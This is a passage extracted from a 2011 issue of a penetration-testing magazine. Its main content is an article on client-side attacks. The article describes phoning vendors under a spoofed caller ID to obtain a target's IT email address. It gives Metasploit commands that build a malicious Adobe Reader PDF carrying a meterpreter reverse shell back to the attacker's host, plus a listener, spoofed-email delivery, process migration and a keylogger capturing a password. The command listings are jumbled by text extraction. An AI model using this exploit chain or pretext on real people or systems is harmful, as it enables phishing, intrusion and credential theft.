Академический Документы
Профессиональный Документы
Культура Документы
08/2011 (08)
TEAM
Managing Editor: Maciej Kozuszek maciej.kozuszek@software.com.pl Associate Editor: Shane MacDougall shane@tacticalintelligence.org Betatesters / Proofreaders: Rishi Narang, Aby Rao, Jeff Weaver, Ed Werzyn, Daniel Wood Senior Consultant/Publisher: Pawe Marciniak CEO: Ewa Dudzic ewa.dudzic@software.com.pl Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl DTP: Ireneusz Pogroszewski Production Director: Andrzej Kuca andrzej.kuca@software.com.pl Front page photo by: www.scribbletime.com Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.pentestmag.com Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes.
All rights to trade marks presented in the magazine are reserved by the companies which own them. program To create graphs and diagrams we used by
DISCLAIMER!
The Christmas time is approaching slowly. Although its still almost a month until Christmas time, and many of us still dont think about it, weve decided to make this pre-Christmas surprise for you, and this time, weve made a small PenTest mishmash, so everyone who looks inside our magazine, will find something for him at last, Christmas is a time for everyone to have joy! Another part of this surprise is also a new column called PainPill, which is authored by Dean Bushmiller. Anyway, lets take a closer look on what you can find here. If youll jump to page 5, youll meet there our friend Aniket Kulkarni, who finally delivered us the second part of his article about Fuzzing. Inasmuch in the previous part you could have familiarized with the theory of fuzzing, this time aniket brings you some practice on plate. Next to Anikets article you can find Milinds Bhargava piece about Client Side Exploits, with attention-drawing title Hi! I hacked your computer. Milind would show you how to compromise the client side systems with the method involving social engineering. However, if youre not into fuzzing nor social engineering, see the next section Standard. This time, weve got here three different articles. First one, brought to us by our new contributor Ric Messier talks about stealth testing technique using NMAP. Ric is making an interesting remark about doing testing where operations staff is unaware of your activities. To read more, just jump to the page 20. Second article will get you straight to the sky, as it speaks about scanning cloud environment. In this short piece Steve Markey will give you all the essential information you may need on this topic. Third one, written by Srinivasan Sundara Rajan talks about BatchPenetration Testing. The author speaks about the importance of batch job in web app pentesting. For those, who felt that there was not enough information about SQL Injection in the previous issue, weve got something for you! Go to the page 34 and youll find out how to defend against SQL attacks and execute them. The author of this paper is Luis Davila. If we go to the page 38, we can see Shane MacDougall in action again. Hes coming back to us after a short absence with the paper about social engineering. Well, this article surely doesnt need recommendation. Right next to the Shanes article you can find a PainPill. Here Dean talks about the law issues concerning IT security specialists, and this one is a must for everyone whos working in the business. In the next issues Dean will be bringing us more interesting stuff, so stay tuned! And finally, at the end of this issue you will find an interview with Sumit Siddharth, author of popular security blog notsosecure.com, speaker at many prestigious conferences and head of Penetration Testing at 7Safe Ltd. We hope, you will find this issue of PenTest compelling and worthful. Thank you all for your great support and invaluable help. Enjoy reading! Maciej Kozuszek & PenTest Team
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
Page 3
http://pentestmag.com
CONTENTS
FUZZING
SQL INJECTION
06
34
This article allows the reader understand the basics of fuzzing as well as the strengths, depth and effect of fuzzing. It explains how fuzzing is done in a practical sense, and shows the basics of initial data analysis and configurations. There is more of an emphasis on utilizing SPIKEfile for file fuzzing and Spike for packet/network Fuzzing.
SQL Injection has been known as an old vector of attack but it also has new variants and methods. It does not matter if it is a PYME or a big company, all of them can suffer from SQL injection vulnerabilities and their data would be at risk. As an example, Sony was hacked this year using SQL Injection as the method of attack and network user data was stolen.
COLUMN
14
38
Effective Social Engineering: Why The Lowest Hanging Fruit Yields a Rotten Crop
By Shane MacDougall
STANDARD
While testing is often accomplished with the full knowledge and cooperation of a client, you may also be engaged to do testing where the operations staff is unaware of your activities. You may be used to test defenses where they are not allowed to prepare specifically for you or the client may simply want to know how their operations staff responds to events and if they can detect them.
This months article is a partial summary of the talk I gave at the ToorCon Security Conference in San Diego this October. This year the conference focused quite heavily on social engineering, and if that trend continues, professional schmoozers might well consider making the trip to Southern California next year.
20
PAINPILL
42
The cloud is a reality for IT professionals, but how secure is it? Since Cloud Service Providers (CSPs) do not allow cloud consumers to individually test their environments why not use a third party Vulnerability Assessment Scanner (VAS) tool/service?
24
If you are doing your job as a penetration tester attacking networks for hire, someone in some jurisdiction is going to think you are breaking the law and that they have jurisdiction over you. Eventually, someone is going to call the police. Eventually, the police or some ThreeLetter-Agency is going to view the tester as a real threat that must be stopped. In his articles, Dean will talk about a different security topic every month.
INTERVIEW
44
28
We are seeing various tools and methodologies to perform the penetration testing for online web applications and ensure that these applications are not compromised with attacks like Cross Site Scripting, SQL Injection and others.
Sumit sid Siddharth works as a Head of Penetration Testing for 7Safe Limited in the UK. He has over 7 years of experience within the IT security industry. He specializes in the application and database security. Over the years, he has contributed a number of white-papers, articles, advisory, tools and exploits to the industry. He has been a speaker at many security conferences including Black Hat, DEF CON, OWASP Appsec, Troopers, SecT etc. He also runs the popular IT security blog: http:// www.notsosecure.com. http://pentestmag.com
Page 4
Hi!
With every passing day, with each new software, hackers around the world start looking for vulnerabilities and write exploit codes for them. Patching those vulnerabilities takes a lot of time and by then the systems have been compromised. As an attacker, there are many ways to compromise the client side systems, my preferred method involves social engineering.
magine you receive a PDF attachment from a friend or a colleague, you open it and you get an Figure 2 PDF attachments because the file maybe damaged or not created properly. Your first thought is that the source may not be good, you run it through antivirus and it shows the file is clean; this gives you the feeling of safety. You now click ok to continue with your tasks to ask your IT for help for to try something else. You didnt realize that you just got owned! In a traditional scenario, an attacker would do dumpster diving and get emails and other printouts to get some information about you. I feel there are better ways to get such information and thats where the art of social engineering comes in. Many a times I have used social engineering techniques to prove that anything can be done if you know how to talk your way through it. In our scenario our attacker has been doing a lot of information gathering using tools such as the (MetaSploit Framework), (Maltego) and other tools to gather email addresses and information to launch a social engineering client side attack on the victim.
crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
Classication
Location: Remote / Network Access Attack Type: Input Manipulation Impact: Loss of Integrity Solution: Upgrade Exploit: Exploit Public, Exploit Commercial Disclosure: OSVDB Verified, Vendor Verified
Scenario
Vulnerability
Description
A remote overflow exists in Adobe Reader and Adobe Acrobat. The document reader fails to properly bounds check input to the util.printf() javascript function resulting in a stack-based overflow. With a specially
08/2011 (8) December
For our demonstration we will talk about how the said Social Engineering will be done to extract the required information. First we choose a victim, then we do go to their website and search the careers section for the available IT Jobs of the company to find out what jobs are vacant, their individual descriptions will give us the information about various software technologies in use. Getting a brief idea, we can then search major vendors websites for their testimonials or clients. Every vendor displays its client list on its website proudly to show credibility and to have major organizations vouch for their quality and work. A call to these vendors posing as a large organization, spoofing your caller id to reflect the same and talking to them, we can ask them to tell us about the victim company, saying we have worked with them before,
http://pentestmag.com
Page 14
we like the products you gave to them, and would like to have the same products for us. Or it can be saying that we have seen your client list and are not sure if we can trust them saying you are new to this region etc. Have the vendor give you the email address of the IT contact they have in the company so you can ask them personally about the vendors claim of excellent services. Most vendors will oblige to this thinking it will be good for this business. The higher the owner of the
Listing 1. Creating malicious PDF le
msf > use exploit/windows/fileformat/adobe_utilprintf FILENAME => XYZComputers-UpgradeInstructions.pdf PAYLOAD => windows/meterpreter/reverse_tcp LHOST => 192.168.8.128 LPORT => 4455
mail id is in the victims hierarchy the better it is for the attacker. After a successful Social Engineering session and scraping for emails from the web, you have gained two key pieces of information. They use XYZ Computers for technical services. The IT Dept has an email address of itdept@victim.com
msf exploit(adobe_utilprintf) > set FILENAME XYZComputers-UpgradeInstructions.pdf msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128 msf exploit(adobe_utilprintf) > set LPORT 4455 msf exploit(adobe_utilprintf) > show options Module options: Name ----
OUTPUTPATH
FILENAME
---------------
/pentest/exploits/framework3/data/exploits
yes
--------
Required
yes
-----------
Description
Payload options (windows/meterpreter/reverse_tcp): Name ---Current Setting --------------192.168.8.128 4455 process -------yes yes Required
-----------
Description Exit technique: seh, thread, process The local address The local port
yes
[*] Creating 'XYZComputers-UpgradeInstructions.pdf' file... [*] Exploit completed, but no session was created. msf exploit(adobe_utilprintf) >
Page 15
http://pentestmag.com
After we are loaded we want to create a malicious PDF that will give the victim a sense of security in opening it. To do that, it must appear legit, have a title that is realistic, and not be flagged by anti-virus or other security alert software. We are going to be using the Adobe Reader util.printf() JavaScript Function Stack Buffer Overflow Vulnerability.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 4455 LPORT => 4455 msf exploit(handler) > set LHOST 192.168.8.128 LHOST => 192.168.8.128 msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler...
IT Dept, We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.
Page 16
http://pentestmag.com
Adobe Reader is prone to stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.
Listing 6. Further exploiting
meterpreter > ps Process list ============ PID --852 1308 2184
So we start by creating our malicious PDF file for use in this client side attack (Listing 1). Once we have all the options set the way we want, we run exploit to create our malicious file (Listing 2). So we can see that our pdf file was created in a subdirectory of where we are. So lets copy it to our /tmp directory so it is easier to locate later on in our exploit.
----
Path
C:\Windows\system32\taskeng.exe C:\Windows\system32\Dwm.exe
2196
VMwareTray.exe iexplore.exe
3176
VMwareUser.exe AcroRd32.exe
3452
meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Migrating to explorer.exe...
[*] Current server process: svchost.exe (1076) [*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816) meterpreter > sysinfo Computer: OFFSEC-PC OS : Windows Vista (Build 6000, ).
Loading extension priv...success. meterpreter > run post/windows/capture/keylog_recorder [*] Executing module against V-MAC-XP
root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt Keystroke log started at Wed Mar 23 09:18:36 -0600 2011 Support, I tried to open this file 2-3 times with no success. I even had my admin and CFO try it, but no Thanks IT Dept
one can get it to open. I turned on the remote access server so you can log in to fix our problem. is admin and password for that session is 123456. Call me when you are done.
Page 17
http://pentestmag.com
Before we send the malicious file to our victim we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener (Listing 3). Now that our listener is waiting to receive its malicious payload we have to deliver this payload to the victim and since in our information gathering we obtained the email address of the IT Department we will use a handy little script called sendEmail to deliver this payload to the victim. With a kung-fu one-liner, we can attach the malicious pdf, use any smtp server we want and write a pretty convincing email from any address we want... (Listing 4). As we can see here, the script allows us to put any FROM (-f) address, any TO (-t) address, any SMTP (-s) server as well as Titles (-u) and our malicious attachment (-a). Once we do all that and press enter we can type any message we want, then press CTRL+D and this will send the email out to the victim. Now on the victims machine, our IT Department employee is getting in for the day and logging into his computer to check his email. He sees the very important document and copies it to his desktop as he always does, so he can scan this with his favorite anti-virus program. As we can see, it passed with flying colors so our IT admin is willing to open this file to quickly implement these very important upgrades. Clicking the file opens
Adobe but shows a greyed out window that never reveals a PDF. The greyed out window looks like this: (Figur 2 Adobe Reader Vulnerability). And then, on the attackers machine what is revealed... (Listing 5). We now have a shell on their computer through a malicious PDF client side attack. Of course what would be wise at this point is to move the shell to a different process, so when they kill Adobe we dont lose our shell. Then obtain system info, start a key logger and continue exploiting the network (Listing 6).
Conclusion
And thats it, its game over for the victim. The attacker can now not only get hold of sensitive information but also copy any data from the victims computer. This vulnerability affects Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument.
Solution
Upgrade to version 8.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Or in a really bad case, reinstall your OS.
MILIND BHARGAVA
Milind Bhargava, (CEH), (ECSA) is in love with the eld of Information Security, in pursuit of his love he has completed his CEH & ECSA certications in 2010 from EC-Council and completed IT Security & Ethical Hacking course from Appin Noida, India. He has worked as Head of IT for an Oil & Gas MNC in Doha, Qatar, where his responsibilities included but were not limited to Network Security. He believes that ethical hacking is an addiction, which you can never master. Its a skill which you can control, but never stop learning more about. And so he continues on his quest as an eternal student.
Page 18
http://pentestmag.com